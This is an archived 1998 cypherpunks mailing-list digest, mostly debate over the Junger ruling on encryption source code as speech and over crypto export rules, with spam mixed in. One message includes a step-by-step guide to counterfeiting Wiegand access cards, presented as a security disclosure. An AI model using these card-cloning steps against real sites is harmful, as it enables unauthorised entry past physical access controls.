>=======================================================================
_
	>


______________________________________________________________________
	Dr.rer.nat. E. Gerck
egerck@novaware.cps.softex.br
	http://novaware.cps.softex.br
	    --- Meta-Certificate Group member, http://www.mcg.org.br ---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "DOnotreply" <Donotreply@28806.com>
Date: Tue, 7 Jul 1998 05:55:49 -0700 (PDT)
To: Friend@public.com
Subject: Best Free XXX on the net!!!!
Message-ID: <199807071254.FAA18182@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I have compiled a list of the best free XXX sites on the net!!
Take a look at:

Best ever

You will save a lot!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Mon, 6 Jul 1998 17:49:05 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Secret World of Spice/Freeway of Love
Message-ID: <19980706235722.1066.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

STUFFED  Mon Jul 6 '98

<img src=http://stuffed.net/98/7/6/cover.gif
width=300 height=380 border=0 alt='Click Here For STUFFED, The NEW Daily Tabloid
 News And Babes Color Supplement From Eureka!'>

Click here to read it: http://stuffed.net/98/7/6/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Gerck <egerck@laser.cps.softex.br>
Date: Mon, 6 Jul 1998 21:09:02 -0700 (PDT)
To: Ernest Hua <Hua@teralogic-inc.com>
Subject: RE: Junger et al.
In-Reply-To: <413AC08141DBD011A58000A0C924A6D52C359A@mvs2.teralogic-inc.com>
Message-ID: <Pine.LNX.3.95.980707003846.742Q-100000@laser.cps.softex.br>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Jul 1998, Ernest Hua wrote:

>So today, I can write the following:
>
>1.	Find a container.
>2.	Fill container with explosive substance.
>3.	Move container to target location.
>4.	Detonate container.
>
>As soon as I have a compiler and a target machine that can execute these
>instructions, suddenly this is not speech.  However, before this
>compiler and machine combo exists, event the electronic form of this is
>speech!
>
>How could this be?

Gwin has written a phrase which deserves more analysis, IMO -- free
from political overtones if we want to be impartial. The phrase can
be reworded as:

  "source code is a device, that actually does a function"

The difference and importance here is between syntatic and semantics. 

Your 4-instruction source code above is not a device today -- it
cannot perform any function. It has only syntatics, not the "how to". 
But, if there were a machine that could supply the proper semantics
(ie, actually perform the functions 1-4) then your source code above
would be a device.  Further, your source code may not be a device
today but be a device tomorrow.

As another example, bringing together one pound of inert metal with
another one pound of the same inert metal was not considered to be
explosive -- until U235 was used for the inert metal and properly
compressed. The difference is semantic, not syntatic. 

In that, Gwin is correct. Can the source code actually perform a
function?  Then, it is a device. Irrespective of the needed platform,
in the same way that an electric shaver is a device irrespective of
the local availablity of an appropriate power outlet.

IMO, even though I consider Gwin to be correct to a very large
extent, widespread use of crypto will not come from lifiting such
bans ... but from real need -- which does not outweigh the hassle,
today. The EFF has a wrong target there. 

Do you know how much Internet e-mail traffic is encrypted today?  Can
you believe less than 10%? Notwithstanding the rethoric exercises and
limelight it may provide, talking about encryption export bans may
not be as effective as desigining better and easier uses of strong
crypto -- that can then really drive market, legislation and courts. 

Need to use is a better key than need to know, it seems.

Cheers,

Ed Gerck

>
>Ern
>
>	-----Original Message-----
>	From:	jkthomson [SMTP:jkthomson@bigfoot.com]
>	Sent:	Monday, July 06, 1998 7:12 PM
>	To:	cypherpunks@toad.com
>	Subject:	Junger et al.
>
>
>
>	Reuters
>
>	3:40pm  6.Jul.98.PDT WASHINGTON -- A district court has
>dismissed a law
>	professor's challenge to US regulations strictly limiting the
>export of
>	computer data-scrambling technology.
>
>	Judge James Gwin ruled late Friday that the export limits, which
>prevented
>	Case Western Reserve University Law School professor Peter
>Junger from
>	posting the text of encryption programs on the Internet, did not
>violate
>	the constitutional right to free speech.
>
>	The Ohio court's ruling contradicts a California district court
>ruling last
>	August that said source code -- the instructions a person writes
>telling
>	the computer what actions to perform -- constitutes a form of
>speech
>	subject to First Amendment protection.
>
>	"Unlike instructions, a manual or a recipe, source code actually
>performs
>	the function it describes," Gwin wrote. "While a recipe provides
>	instructions to a cook, source code is a device, like embedded
>circuitry in
>	a telephone, that actually does the function of encryption."
>
>	Neither ruling gave speech protection to compiled code, a
>version of source
>	code converted into an actual software program that could be run
>on a
>	computer.
>
>	The US government appealed the California decision and the issue
>may
>	ultimately be decided by the Supreme Court.
>
>	Civil libertarians and high-tech companies had hoped the court
>would
>	overturn the export limits on encryption technology, which uses
>	mathematical formulas to scramble information and render it
>unreadable
>	without a password or software "key."
>
>	Once the realm of spies and generals, encryption has become an
>increasingly
>	critical means of protecting electronic commerce and global
>communications
>	over the Internet.
>
>	But law enforcement agencies, fearing encryption will be used by
>terrorists
>	and international criminals to hide their activities, have
>instituted
>	strict controls to limit the export of strong scrambling
>products.
>
>	Lawyers opposed to the export rules said the Ohio court
>misunderstood the
>	difference between source code and compiled code.
>
>	"The Ohio court clearly doesn't understand the communicative
>nature of
>	software," said Shari Steele, an attorney with the Electronic
>Frontier
>	Foundation. "It's true that software helps to perform functions,
>but it
>	does so by telling computers what to do.... It certainly is
>speech
>	deserving of the highest levels of First Amendment protection."
>
>
>
>
>-----------------------------------------------------------------------
>	 james 'keith' thomson <jkthomson@bigfoot.com>
>www.bigfoot.com/~ceildh
>	 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D
>[06.07.98]
>	 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9
>[05.14.98]
>	 ICQ:746241 <keys> at pgp.mit.edu     ...and former sysop of
>tnbnog BBS
>
>-----------------------------------------------------------------------
>	Technology is introduced, utilized, depended upon, obsolete, 
>	standardized, and understood, in that order
>
>=======================================================================_
>

______________________________________________________________________
Dr.rer.nat. E. Gerck                     egerck@novaware.cps.softex.br
http://novaware.cps.softex.br
    --- Meta-Certificate Group member, http://www.mcg.org.br ---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Gerck <egerck@laser.cps.softex.br>
Date: Mon, 6 Jul 1998 22:28:14 -0700 (PDT)
To: Ernest Hua <Hua@teralogic-inc.com>
Subject: RE: Junger et al.
In-Reply-To: <413AC08141DBD011A58000A0C924A6D52C359C@mvs2.teralogic-inc.com>
Message-ID: <Pine.LNX.3.95.980707014557.742b-100000@laser.cps.softex.br>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Jul 1998, Ernest Hua wrote:

>I think we are in violent agreement here ...
>
>Except that it seems odd that speech is no longer 1st amendment
>protected as soon as it can be interpreted by a machine to do something.
>So, then, if I want to deny you first amendment protections for
>something, I can simply write a compiler to turn your words into machine
>executable code, and suddenly, your words are no longer protected
>speech.  How could that be a reasonable interpretation of functional
>versus not?
>

By the same reasoning as in my posting:

>>
>>As another example, bringing together one pound of inert metal with
>>another one pound of the same inert metal was not considered to be
>>explosive -- until U235 was used for the inert metal and properly
>>compressed. The difference is semantic, not syntatic. 
>>

Thus, your instructions to bring together those two one-pound pieces
would be your right to free speech -- maybe it is poetry -- as long
as that is not recognized as a federal crime! After it boooms the
first time... it is a device, and it is immediately recognized to be
an unlawful one. 

>Secondly, Gwin said that encryption is a special class of software which
>is MORE functional.  This is definitely a misunderstanding, to say the  

I could not find that quote -- "more functional".

BTW, I think that Gwin was struggling to express the notion that
source code (syntax) is a device whenever there is a clear binding
between that source code and known semantics, together with proper
pragmatics (the enviroment, as defined in semiotics), in order to
perform the desired function. 

This is called a Just In-Iime Compiler ... and Gwin is 100% right
when he affirms that the difference between source code and compiled
code is null regarding its effects -- its desired function. 

Thus, if the device is unlawful then it must be unlawful both as a
source code and as a compiled code. 


Cheers,

Ed Gerck


______________________________________________________________________
Dr.rer.nat. E. Gerck                     egerck@novaware.cps.softex.br
http://novaware.cps.softex.br
    --- Meta-Certificate Group member, http://www.mcg.org.br ---












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Tue, 7 Jul 1998 00:21:04 -0700 (PDT)
To: Ernest Hua <Hua@teralogic-inc.com>
Subject: RE: Junger et al.
In-Reply-To: <413AC08141DBD011A58000A0C924A6D52C359A@mvs2.teralogic-inc.com>
Message-ID: <Pine.LNX.3.96.980707030820.4214B-100000@ismene>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Jul 1998, Ernest Hua wrote:

> Did anyone demonstrate the "functionalness" of any arbitrary language
> via a scanner and a compiler?

Indeed.. what we need is for someone to testify to the court about
natural and computer language, and maybe some relevent material from
information theory. 

Pseudo-code from any computer programming textbook would be helpful
in making this point too.

What about English in a voice recognition system? In this case, English
can actually perform functions too, just as C does.


Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Enlightenment is man's emergence from his self-incurred immaturity.
Immaturity is the inability to use one's own understanding without the
guidance of another. . .Sapere aude! Have the courage to use your own
understanding!" - Immanuel Kant "What is Enlightenment?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <vjb@gil.com.au>
Date: Mon, 6 Jul 1998 13:56:05 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Update on status of Pauline Hanson's One Nation web sites
Message-ID: <1.5.4.32.19980706204122.00729e64@mail.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


G'day One Nation supporters in NSW

I am Scott Balson, Pauline Hanson's web master and the moderator of the now
defunct discussion forum mentioned in a recent news letter. You will notice
that I am not using my normal "gwb" email.

I apologise for the demise of the very successful discussion forum, but may
I say that nothing surprises me any more.

The forum was run on a third party web site and the owner took two weeks
leave on Sunday - the day before the forum "shut down".

Quite simply it was hacked by an unknown person because it was so
successful. This is the face of free speech in Australia. NOTE: The hacker
was not the site owner.

To make matters worse, last Friday, the One Nation pages went down after the
ISP we used, Pronet, had their link closed by Optus because of financial
difficulties... we have taken remedial action and hope to have the site
fully operational in the next 48 hours at:

http://www.gwb.com.au/onenation

The last few weeks I have seen, heard of and personally faced a growing
number of personal attacks aimed at those involved in the One Nation party.
In my case this has included being followed while driving my car (last week)
and phone calls from the media wanting me to comment on "anonymous",
unsubstantiated and trumped-up allegations that were made personally against
me. (For example, when questioned about his call to me on Sunday Rory
Callinan from "The (News Limited) Courier Mail" confirmed that they would
not normally bother with allegations made on this basis but my role within
the party had made an anonymous allegation "newsworthy" and worth pursuing.)

This follows the party's success in the Queensland state elections.

May I just say that this makes me realise that One Nation is obviously
having a big impact on those who have got the most to lose and through their
actions they have just increased my resolve to do all that I can to ensure
Pauline Hanson and the party get a "fair go" on the Internet even if this
right is denied by the mainstream media.

The events and incidents against the party will continue to be covered on my
Australian National News of the Day (anotd) which should be live again soon
(also temporarily closed because of the Pronet collapse) The address for
anotd is: http://www.gwb.com.au/gwb/news

The agenda for getting One Nation back on-line and the discussion form up
and running again is as follows:

One Nation web site and anotd fully operation by Friday 10th July (probably
before)
http://www.gwb.com.au/onenation

Discussion forum (through GWB) fully operational by end of July.

I will keep this group informed when the discussion forum is again
operational and once again apologise for the temporary loss of our forum in
which to discuss issues.

Please do not respond to this temporary account unless it is on a matter of
urgency.

The gwb@gwb.com.au email address will be up and running again by this weekend.

GWB



Scott Balson
Pauline Hanson's Web Master





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 7 Jul 1998 06:49:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: keystrokes and crooked judges
Message-ID: <35A22681.7F5D@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

I am reading http://www.jya.com/gaks-de.htm

Perhaps this e-mail may interest you

Best
bill
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2
http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html



Monday 6/8/98 7:53 AM  
  
John Young  
  
I am reading http://jya.com/sitesec.htm a bit more carefully.  
  
You have NEVER WRITTEN SO MUCH.  
  
Fishing was great.  
  
I used a   
  
          $10 THE  INSTANT CALLING CARD [TM]   
          VOCALL COMMUNICATIONS CORP  
	  The World's Most advanced prepaid Calling Card  
  
which allows access with a pin of 718-2455-7091-xxx [my SECRET]  
in ENGLISH, SPANISH, ARABIC, URDU, KOREAN, JAPANESE, GERMAN,   
FRENCH, ITALIAN to call you TWICE on Saturday.  At only $.14/min.  
  
I left one message about Xandi and spiking computer keyboards.  
  
Xandi MADE low-power transmitters,   
  
http://www.gernsback.com/HyperNews/get/forums/resource/226.html  
  
like the kind I MIGHT use IF I were going to spike a keyboard [most
which use an 8051  
  
 
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2]  
  
so that the keystrokes would be broadcast.    
  
This, of course, defeats crypto attempts to cipher keystrokes.  
  
But I DO NOT DO, or have to do, ILLEGAL THINGS for the FBI or any other
government agency.  
  
I, as a DOE contractor employee, was protected under 10 CFR 708.  
http://av.yahoo.com/bin/query?p=10+cfr+708&hc=0&hs=0  
  
But 10 CFR 708 does not appear to be working well in my case.   
  
Therefore, we had to try other remedies.  
  
VOCALL is getting real close to digital cash, one of Orlin Grabbe's 	  
interests.  http://www.aci.net/kalliste/dcguide.htm  
  
I have to do mostly technical work on the digital FX this week but will
try to  
get two notices of appeal to the Tenth circuit written.
http://jya.com/whp043098.htm  
  
Morales and I, with all the publicity you and Orlin have given us, can  
go all the way to the Supreme Court with our genocide and crypto  
deficiency lawsuits. http://jya.com/whpfiles.htm  
  
Pro se, of course.  
  
Too bad NSA did not take my criticisms of its shift register work  
more constructively.  http://jya.com/da/whpda.htm,  click on Appendix S  
  
Perhaps NSA should have worked with some of us at Sandia to come-up  
with fixes to overcome deficiencies. This unpleasantness could have been
avoided.  
  
I've had ideas to improve shift register algorithm operation before.  
http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html  
  
Let's all hope for settlement of this UNFORTUNATE matter before it  
gets worse.  
  
Later  
bill  

And this too.

Subject: 
        FBI agents and Junger
  Date: 
        Tue, 07 Jul 1998 07:32:36 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        jy@jya.com
    CC: 
        art morales <armoral@sandia.gov>, whitfield diffie
<diffie@eng.sun.com>, tom carpenter - halcyon <tomcgap@halcyon.com>,
        marc rotenberg <rotenberg@epic.org>, national employee rights
institute <neri@nerinet.org>, mab@research.att.com,
        mejudson@mail.wdn.com, lwirbel@aol.com, klayman
<jwatch@erols.com>, john gilmore <gnu@toad.com>,
jpcarson@mindspring.com,
        jdelia@gnn.com, jeff debonis <76554.133@compuserve.com>, jay
coughlan <ccns@nets.com>, jason vest <vestj@aol.com>,
        j orlin grabbe <kalliste@aci.net>, david sobel <sobel@epic.org>,
Cindy@McGlashan.com


Tuesday 7/7/98 7:28 AM

John Young

I am reading http://www.jya.com/pdj10.htm

FBI agents Perez, Rodrigues, and Silva warned us about the crooked
judges at the appellate level.  

The FBI blackmailed Perez, Rodrigues, and Silva into a cheap settlement
of their race discrimination lawsuit win in Lucius Bunton's West Texas
court.

They all lost money.  And all got divorced.

Perez is a buddy of Morales and Gonzales.

Gonzales and Armenta are buddies of Silva.

Hugo Rodrigues moved to Florida.

This information is VERY VALUABLE to Morales and me.

It shapes our response to the two letters from the Tenth I put
in the mail to you yesterday.

NO FUTURE IN ARGUING POINTS OF LAW WITH CROOKED JUDGES.

bill


Counterfeiting Wiegand Wire Access Credentials
     
                                   Bill Payne
     
                                 October 16,1996
     
                                    Abstract
     
                  Wiegand wire access credentials are easy and
                  inexpensive to counterfeit.
     
        Access Control & Security Systems Integration magazine, October
        1996 [http://www/securitysolutions.com] published the article,
     
             Wiegand technology stands the test of time
     
             by PAUL J. BODELL, page 12
     
             Many card and reader manufacturers offer Wiegand (pronounced
             wee-gand) output.  However, only three companies in the
             world make Wiegand readers.  Sensor Engineering of Hamden
             Conn., holds the patent for Wiegand, and Sensor has licensed
             Cardkey of Simi Valley, Calif., and Doduco of Pforzheim,
             Germany, to manufacture Wiegand cards and readers. ...  A
             Wiegand output reader is not the same thing as a Wiegand
             reader,  and it is important to understand the differences.
     
                In brief, Wiegand reader use the Wiegand effect to
             translate card information around the patented Wiegand
             effect in which a segment of a specially treated wire
             generates an electronic pulse when subjected to a specific
             magnetic field.  If the pulse is generated when the wire is
             near a pick-up coil, the pulse can be detected by a circuit.
             Lining up several rows of wires and passing them by a cold
             would generate a series of pulses.  Lining up two rows of
             wires - calling on row "zero bits" and the other "one bits"
             - and passing them by two different coils would generate two
             series of pulses, or data bits.  These data bits can then be
             interpreted as binary data and used to control other
             devices.  If you seal the coils in a rugged housing with
             properly placed magnets, and LED and some simple circuitry,
             you have a Wiegand reader.  Carefully laminate the special
             wires in vinyl, and artwork, and hot-stamp a number on the
             vinyl, and you have a Wiegand card.
     
             IN THE BEGINNING
     
               Wiegand was first to introduce to the access control
             market in the late 1970s.  It was immediately successful
             because it filled the need for durable, secure card and
             reader technology.
               Embedded in the cards, Wiegand wires cannot be altered or
             duplicated. ...
     
        Bodell's Last statement is incorrect.
     
        Tasks for EASILY counterfeiting Wiegand wire cards are
     
        1    Locate the wires inside the card to read the 0s and 1s.
     
        2    Build an ACCEPTABLE copy of the card.
     
        Bodell's clear explanation of the working of a Wiegand card can
        be visualized
     
             zero row    |     |   |
     
             one row        |          |
     
             binary      0  1  0   0   1
             representation
     
        Solutions to Task 1
     
             A    X-ray the card
     
             B    MAGNI VIEW FILM,  Mylar film reads magnetic fields ...
                  Edmunds Scientific Company, catalog 16N1, page
                  205, C33,447  $11.75
     
        is placed over the top of the Wiegand card.
     
        COW MAGNET,  Cow magnetics allow farmers to trap metal in the
        stomachs of their cows.  Edmunds, page 204, C31,101 $10.75
        is placed under the card.
     
        Location of the wires is easily seen on the green film.
     
        Mark the position of the wires with a pen.
     
        Next chop the card vertically using a shear into about 80/1000s
        paper-match-sized strips.
     
        Don't worry about cutting a wire or two.
     
        Note that a 0 has the pen mark to the top.  A 1 has the pen mark
        at the bottom.
     
        Take a business card and layout the "paper match"-like strips to
        counterfeit the card number desired.
     
        Don't worry about spacing.  Wiegand output is self-clocking!
     
        Tape the "paper-match - like" strips to the business card.
     
        Only the FUNCTION of the card needs to be reproduced!
     
                                     History
     
        Breaking electronic locks was done as "work for others" at Sandia
     
        National Laboratories beginning in 1992 funded by the Federal
        Bureau of Investigation/Engineering Research Facility, Quantico,
        VA.
     
        The FBI opined that this work was SECRET/NATIONAL SECURITY
        INFORMATION.
     
        Details of the consequences of this work are covered in
     
             Fired Worker File Lawsuit Against Sandia
             Specialist Says He Balked When Lab Sought Electronic
             Picklock Software, Albuquer Journal, Sunday April 25, 1993
     
             State-sanctioned paranoia,  EE Times, January 22, 1996
     
             One man's battle,  EE Times, March 22, 1994
     
             Damn the torpedoes,  EE Times, June 6, 1994
     
             Protecting properly classified info,  EE Times, April 11,
             1994
     
             DOE to scrutinize fairness in old whistle-blower cases,
             Albuquerque Tribune, Nov 7 1995
     
             DOE boss accelerates whistle-blower protection,  Albuquerque
             Tribune, March 27, 1996
     
             DOE doesn't plan to compensate 'old' whistle-blowers with
             money, Albuquerque Tribune September 27, 199




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 6 Jul 1998 23:35:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: no subject!Anti-National ID Bill
Message-ID: <199807070635.IAA08822@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Where is this?  Stalled.  Looks dead in the water.  Any further insights?


H.R.3261 
SPONSOR: Rep Paul (introduced 02/25/98) 

SUMMARY: 

(AS INTRODUCED) 

Privacy Protection Act of 1997 (sic) - Amends title II (Old Age, Survivors
and Disability Insurance) of the Social Security Act and the Internal
Revenue Code to prohibit any Federal, State, or local government agency or
instrumentality from using a social security account number or
any derivative as the means of identifying any individual, except for
specified social security and tax purposes. 

Amends the Privacy Act of 1974 to prohibit any Federal, State, or local
government agency or instrumentality from requesting an individual to
disclose his social security account number on either a mandatory or a
voluntary basis. 

Prohibits any two Federal agencies or instrumentalities from implementing
the same identifying number with respect to any individual, except as
authorized under this Act. 


----
STATUS: Detailed Legislative Status 

                                                 House Actions

Feb 25, 98:
     Referred to the Committee on Ways and Means, and in addition to the
Committee on Government Reform and Oversight, for a period to
     be subsequently determined by the Speaker, in each case for
consideration of such provisions as fall within the jurisdiction of the
     committee concerned. 
     Mar 2, 98:
          Referred to the Subcommittee on Government Management,
Information and Technology.
Feb 25, 98:
     Referred to the Committee on Ways and Means, and in addition to the
Committee on Government Reform and Oversight, for a period to
     be subsequently determined by the Speaker, in each case for
consideration of such provisions as fall within the jurisdiction of the
     committee concerned.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Arnold G. Reinhold" <reinhold@world.std.com>
Date: Tue, 7 Jul 1998 05:46:16 -0700 (PDT)
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: IP: "CyberCash can't oust credit cards"
In-Reply-To: <v0401170bb1c67c2a2ef8@[139.167.130.246]>
Message-ID: <v03130308b1c7c7a655e2@[24.128.118.45]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:13 AM -0400 7/6/98, Robert Hettinga wrote:
>Hettinga's three laws of internet payment technology investment:
>
>1. Geodesic, peer-to-peer transactions.
>2. Three orders of magnitude cost reduction.
>3. Nothing but net.
>
>The application of the above to Cybercash, or SET, for that matter, I leave
>as an exercise for the reader...
>

Three orders of magnitude cost reduction as compared to what?  I can
believe that much improvement over running my credit card thru an imprinter
and processing the paper slip.  But I doubt you can get anything like1000X
over SET, ugly as it is.

Arnold Reinhold






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@homebusinesscentral.net
Date: Tue, 7 Jul 1998 09:56:42 -0700 (PDT)
To: <cypherpunks-unedited@toad.com>
Subject: MAKE MORE MONEY ONLINE
Message-ID: <199807071656.JAA23629@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Friend and Internet Entrepreneur,

Discover little known ways of how to promote virtually any product, 
service or idea online and see income within 24 hours. Guranteed!
 
It's finally here!

**ALL NEW** E-Mail Marketing Home Study Course reveals
how to use responsible, targeted, e-mail marketing in your business
to boost Web site traffic, generate leads, sell products, and make
more sales online.

Learn totally new information about how to e-mail your sales message to
prospects and sell your products and services online without getting flamed. 

Discover detailed techniques for using opt-in marketing, 
compiling mailing lists, the secrets of writing ad copy, and much more. 

You will learn:

How to create targeted e-mail lists of prospects who 
are as much as 5 times more responsive than names you can rent or buy. 

Discover which e-mail management and sending software is best.
(And Receive A FREE 10 Day Trial Version Of The Best One)

Discover which teaser ads and subject lines get your mail opened and
responded to quickly. 

How to use e-mail to generate qualified traffic to a Web site. 
And Much Much More....

You will receive an extensive step by step
course guiding you every step of the way!

Plus as part of this national marketing test if you ACT NOW! you are 
going to receive as a bonus gift:
"The Secrets To Successful Search Engine Submission" Audio series
Learn how to get on top and stay on top!

"I generated 19 brand new paying customers in less than a week with this
course" Thank You

To learn more about this exciting course please visit us at 

http://www.homebusinesscentral.net/emarket.html

This is a very limited offer, so act now!

To be removed from this list please respond with "remove" in 
the subject field


World Tek Inc.
7210 Jordan Ave.
Canoga Park CA. 91303
1-818-718-9429































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Tue, 7 Jul 1998 10:07:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Private-enterprise wiretapping
Message-ID: <3.0.5.32.19980707100633.0090d580@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




STOLEN NUMBERS -- [New York Times, p. 31, 7/5.] 
Federal investigators said the scam was ingenious in its simplicity: 
Five people in New York City would tap into public pay phones at major airports 
across the country, then steal calling-card numbers
punched in by unsuspecting travelers. The scheme ended last month 
with the arrests of four men and one woman. But the case is
only the latest machination in a $4-billion-a-year telephone fraud 
industry that keeps reinventing itself. "This is something we have
not seen before," said Boyd Jackson [of] network security at AT&T, 
one of the industry experts who helped Federal investigators on
the case. "And there is nothing I am aware of that customers can do 
to fully protect themselves." The Secret Service was tipped off
by AT&T, Bell Atlantic and MCI after they received an unusually 
high number of complaints from customers who had recently used
their calling cards in airports. 
[Also San Jose Mercury News, 1C; Rocky Mountain News, 33A; Sun-Sentinel, 3A, 7/4.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 7 Jul 1998 07:40:04 -0700 (PDT)
To: "Arnold G. Reinhold" <cypherpunks@toad.com
Subject: Re: IP: "CyberCash can't oust credit cards"
In-Reply-To: <v0401170bb1c67c2a2ef8@[139.167.130.246]>
Message-ID: <v04011730b1c7e1f43186@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:47 AM -0400 on 7/7/98, Arnold G. Reinhold wrote:



> Three orders of magnitude cost reduction as compared to what?  I can
> believe that much improvement over running my credit card thru an imprinter
> and processing the paper slip.

Yes. SSL and HTML does that to paper, even telephone, credit card
transactions. As long as you're using the net anyway. :-).

> But I doubt you can get anything like1000X
> over SET, ugly as it is.

Actually, it's *SET's* burden to proove that it's 1000X cheaper (including
the cost of fraud) than SSL, the status quo ante of internet payment
systems.

I don't think SET is cheaper, much less three orders of magnitude cheaper,
than SSL.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The Philodox Symposium on Digital Bearer Transaction Settlement
  July 23-24, 1998: <http://www.philodox.com/symposiuminfo.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cindy Cohn <Cindy@mcglashan.com>
Date: Tue, 7 Jul 1998 11:15:45 -0700 (PDT)
To: bernstein-announce@toad.com
Subject: Junger decision
Message-ID: <199807071759.KAA28716@gw.quake.net>
MIME-Version: 1.0
Content-Type: text/plain


For those who haven't yet heard,

Judge Gwin in the District Court in Ohio has granted the government summary
judgment in the Junger case.  Judge Gwin apparently agreed with the
government that the "functionality" of  encryption source code, and the
government's claims that it only intends to regulate that "functionality"
mean that the regulations are not "narrowly and directed at expressive
conduct" and so do not merit prior restraint analysis.  The Judge then held
that the regulations were content neutral, applied the intermediate scrutiny
tests and found that the export restrictions meet those tests.

I haven't had the opportunity to review the decision yet.  As soon as I
have, I will post some brief comments.

Still no decision from the 9th Circuit in Bernstein.  

Cindy



******************************
Cindy A. Cohn, Cindy@McGlashan.com
McGlashan & Sarrail, P.C.
177 Bovet Road, 6th Floor
San Mateo, CA 94402
(650) 341-2585 (tel)
(650) 341-1395 (fax)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 7 Jul 1998 09:13:58 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 7, 1998
Message-ID: <199807071605.LAA11317@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



=============================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.
=============================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 7 Jul 1998 08:17:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: US to Ease Crypto Export
Message-ID: <199807071517.LAA25263@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


7 July 1998 
Source:
http://www.washingtonpost.com/wp-srv/WPlate/1998-07/07/064l-070798-idx.html
Thanks to FT
  
U.S. to Ease Limits on Export of Data-Scrambling Technology

By Elizabeth Corcoran
Washington Post Staff Writer
Tuesday, July 7, 1998; Page E04 

Commerce Secretary William Daley plans to announce today
that the government will give U.S. software companies new
freedom to export their most sophisticated data-scrambling
technology to financial institutions chartered in 45 countries,
according to Clinton administration sources.

Under the new rules, which officials said are likely to take
effect in late summer, eligible banks, securities firms,
brokerage houses and credit-card companies will need to
receive approval only once from the Commerce Department
before they can license the most sophisticated "encryption," or
data-scrambling, technology.

Once they receive approval, those institutions will be
permitted to share the technology with any of their branch
offices, except for those located in terrorist states.
Government sources estimate that the new rules will include
about 70 percent of the world's banks, including the 100
largest (ranked by assets).

For years, the government has closely regulated export of
encryption software, on the grounds that terrorists or hostile
governments might use it to cloak their communications. The
software industry argues that the rules are unworkable and
unfairly block foreign sales. Unfriendly parties wanting to use
encryption already can obtain it overseas, industry executives
said.

The new rules on banks are "a move in the right direction,"
said one industry executive familiar with the regulations. "But
we're still leaving some groups out. Basically, we need to keep
spreading the circle wider," to include the growing number of
businesses offering financial services, such as insurance
companies.

"What we've heard sounds great," said Kawika Daguio, a
lobbyist for the American Bankers Association. "We've been
arguing [for several years] that the regulatory structure we
have guarantees we're good citizens" who wouldn't make illicit
use of the technology, he said.

Now the government appears to have agreed.

Current regulations require that U.S. companies apply for
permits before exporting anything but the simplest versions of
encryption products. To export more sophisticated
technology, organizations must have a plan for creating
so-called "spare keys." That way, law enforcement officials
who have obtained a court order would be able to unlock the
information.

In May 1997, the Commerce Department said it would not
restrict the sophistication of the data-encryption technology
sold to financial institutions. But it required spare keys and
case-by-case licensing. Approvals have been slow. Now the
government is doing away with the key requirement, defining
more precisely which financial institutions qualify and pledging
to end case-by-case approval.

Because of concerns about money laundering, the government
will grant the new permission only to financial institutions
